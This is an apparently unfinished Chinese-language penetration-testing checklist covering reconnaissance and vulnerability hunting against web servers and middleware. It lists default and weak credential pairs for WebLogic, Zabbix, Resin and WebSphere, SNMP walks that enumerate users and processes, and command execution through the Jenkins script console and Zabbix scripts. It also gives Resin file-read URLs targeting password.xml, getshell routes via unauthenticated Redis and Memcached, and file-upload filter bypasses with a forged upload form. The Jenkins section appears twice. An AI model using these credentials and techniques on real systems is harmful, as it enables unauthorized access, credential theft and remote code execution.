渗透测试流程未完成篇
信息收集---
|
|
开放的端口
端口服务
DNS:DNS域传输漏洞(测试方法:dnsenum 域名)
WEB指纹识别
C段查询
旁站查询
WHOIS信息
网站敏感目录
网站泄露的目录
查看HTML有没有有用的注释
收集管理员邮箱
网站后台
常见的服务是否有弱口令:FTP匿名访问/弱口令,Rsync匿名访问:端口是873
端口服务nmap脚本扫描看看能不能挖到漏洞
searchsploit搜索系统服务看看能不能找到exp
burpsuite爬网站
表单尝试弱口令
表单尝试逻辑漏洞,
cms识别。
weblogic弱口令:默认管理员账号密码:weblogic/weblogic,开放的端口是:7001还有扫描80与8080端口看banner。默认weblogic是/console。常见的弱口令:
weblogic / welcome1
system / password
admin / security
mary / password
joe / password
wlcsystem / wlcsystem
wlpisystem / wlpisystem
weblogic / weblogic123
weblogic / 12345678
admin / 12345678
s2漏洞
web服务器解析漏洞
Struts漏洞
网站备份文件
Apache Server status对外暴露,测试方法:访问http://xxx.com/server-status
snmp弱口令:snmp服务器的默认密码为public,漏洞发现与扫描:
<1>x-scan扫描 + GFI LANGard利用
<2>使用Snmp Digger进行漏洞利用
<3>snmputil.exe
snmputil.exe get|getnext|walk agent community oid[oid……]
当前进程列表 snmputil.exe walk ip public .1.3.6.1.2.1.25.4.2.1.2
系统用户列表 snmputil.exe walk ip public .1.3.6.1.4.1.77.1.2.25.1.1
列 出 域 名 snmputil.exe walk ip public .1.3.6.1.4.1.77.1.4.1.0
列出安装软件 snmputil.exe walk ip public .1.3.6.1.2.1.25.6.3.1.2
列出系统信息 snmputil.exe walk ip public .1.3.6.1.2.1.1
<4>IP Network Browser(snmp浏览工具)
snmp默认开放的端口:161
snmap获取管理员密码:扫描工具: solarwinds中的snmpsweep
升级版: solarwinds工具包中的?ip browser
<2>华为quidway三层交换
利用这个OID读出的密码为明文(WooYun-2013-21964)
root@bt:~# snmpwalk -c private -v 1 x.x.x.x 账号的oid
svn文件泄露
nagios信息泄露
hadhoop对外访问 检测弱口令
RTX即时通信泄露,端口:8012。开放应用端口暴露: http://xx.xx.xx.xx:8012/userlist.php
直接可以访问到所有用户id、用户名等信息的json
在“查看审核结果处”尝试用户名+弱口令(3102 或123456)登陆,登陆成功后即进入内部网络。
<2>得到用户名后,可以读取手机号
用户名: rtx.bxlq.com/userlist.php
手机号: rtx.bxlq.com/getmobile.cgi?receiver=用户名
Ganglia系统监控信息泄露 开放端口:8649或8000 检测方法:<1>直接在浏览器地址栏输入IP:8649 eg: http://xx.xx.xxx.xx:8649/
<2>直接访问域名:ganglia.xx.com
<3>使用nc查看: nc.exe iii.com 8649 |more
j2ee应用架构(web服务器搭配不当)访问敏感目录:http://xxx.com/WEB-IINF/web.xml
Jenkins平台未设置登录验证 利用方法:<1>未授权访问,可直接执行命令 wooyun-2013-028803
直接在url中访问: eg: http://xx.xx.xx.xx:8080 (端口视具体情况而定,案例中有3000、8888)
<2> http://ip/script
java.lang.Runtime.getRuntime().exec(‘id’).getText(); 行脚本并回显一句话
<1>未授权访问,可直接执行命令 wooyun-2013-028803
直接在url中访问: eg: http://xx.xx.xx.xx:8080 (端口视具体情况而定,案例中有3000、8888)
<2> http://ip/script
java.lang.Runtime.getRuntime().exec(‘id’).getText(); 行脚本并回显一句话
zabbix默认口令 利用方法:弱口令进入后台: http://ip/zabbix/ admin / zabbix
攻击方法:
<1>尝试system.run执行命令
<2>获取zabbix server shell:
Administrator——>Scripts——>修改Commands(例如改为 uname -a)
Monitoring——>Last data——>点击Zabbix server,执行调用命令
Resin任意文件读取 利用方法:<1>任意文件读取:
配置文件:
http://ip/resin-doc/examples/ico-periodictask/viewfile?file=WEB-INF/web.xml
读取源码:
http://ip/resin-doc/examples/ico-periodictask/viewfile?file=index.xtp
读取password.xml
ip/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/password.xml
<2>resin文件包含漏洞shell (wooyun-2013-023139)
http://ip/Resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini
<3>resin弱口令
http://ip/resin-admin/status.php admin / admin
<4>resin版本过低,导致磁盘信息泄露
http://ip/c:/
memcache未限制访问IP 利用方法:Memcached未限制IP导致cache泄露 服务默认端口:11211
使用nc 反弹查看数据:
<1>
nc.exe –vv ip 11211
ip: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [ip] 11211 (?) open
stats items
STAT items:4:number 1544729
…….
<2>memcached空口令访问 可以直接telnet登陆 wooyun-2010-0123604
<2>root@kali:~# nc ip 11211
Jboss配置不当 利用方法:检测以下目录:
http://yy.yy.yy.yy/admin-console/
http://yy.yy.yy.yy/jmx-console/
http://xx.xx.xx.xx/web-console/
yy.yy.yy.yy/invoker/JMXInvokerServlet
tomcat弱口令
phpmyadmin弱口令
MongoDB配置不当
Django配置不当致信息泄露
Redis未授权访问 开放的端口:6379 一般不需要认证,可直接访问 利用方法:<1>Kali下:
redis-cli -h xx.com
<2>使用软件: Redis Desktop Manager
<3>利用redis未授权访问漏洞getshell【www.secpulse.com/archives/5357.html】
①开启web服务
②网站物理路径
③www目录可写(root权限)
LDAP未授权访问 开放端口:389 利用方式:使用LDAP Admin进行登陆
SMB弱口令 开放端口:445
openssl心脏出血 开放端口:443 检测方法:用nmap脚本检测 利用方式:metasploit里面有脚本
squid代理默认端口 开放端口:3128 若没有设置口令,则很可能直接漫游内网。
GlassFish web中间件弱口令 开放端口:4848 检测
elasticsearch代码执行 开放端口: 9200
websphere web中间件弱口令 开放端口:9043 常见弱口令:admin / admin
websphere / websphere
system / manager
zebra路由弱密码 开放端口:2601,2604
rundeck web 开放端口:4440 检测方法:检测以下路径 http://IP:4440 admin / admin http://IP:4440/menu/home
dns未设置spf导致邮箱欺骗漏洞 检测方法:nslookup –qt=mx baidu.com nslookup –qt=txt baidu.com
CVS源码泄露
Tomcat examples directory漏洞 检测方法:http://yy.yy.yy.yy/examples/servlets/servlet/SessionExample
漏洞挖掘---
|
|
SQL注入:注意网站的URL有id=?都拿到SQLMAP测试一遍或者手测,表单进行单和双引号进行测试,用burpsuite抓表单提交的包扔SQLMAP跑,网站有调用数据库的地方都测试一遍,API接口测试SQL注入
文件上传:能上传文件的地方就尝试进行挖掘。遇到拦截先看看服务器用什么配置的环境。例如是IIS6.0(IIS环境大部分都有文件上传漏洞可以百度发现)或Apache等等。。都可以百度看看有什么上传绕过。一般绕过方式为:后缀大小写绕过,文件类型绕过,双写后缀名绕过,请求特殊后缀绕过,图片木马合并上传,文件00截断绕过,截断攻击%和&,web服务器环境配置寻找漏洞 例如:IIS6.0的解析漏洞1)前端JavaScript验证 (发现有只前端验证的话,手动写一个文件上传的html将action设置为判断文件即可。)例如:
检测上传文件的是:upload.php 但是服务端没做判断,前端做了判断。
<form action=’http://xx/upload.php’ method=’post’>
<input type=’file’ name=’file’ id=’file’><br>
<input type=’submit’ value=’提交’>
</form>
文件包含:注意url后面有include=xx.php,或tiao=xx.php,file=xxx.php,总之注意一下url。先判断远程包含或本地包含,可以远程包含直接Getshell即可。本地包含可以利用各种伪协议例如:php,data,zip等等。。或与文件上传漏洞一起利用。详细的利用手法:https://www.cnblogs.com/haq5201314/p/9248281.html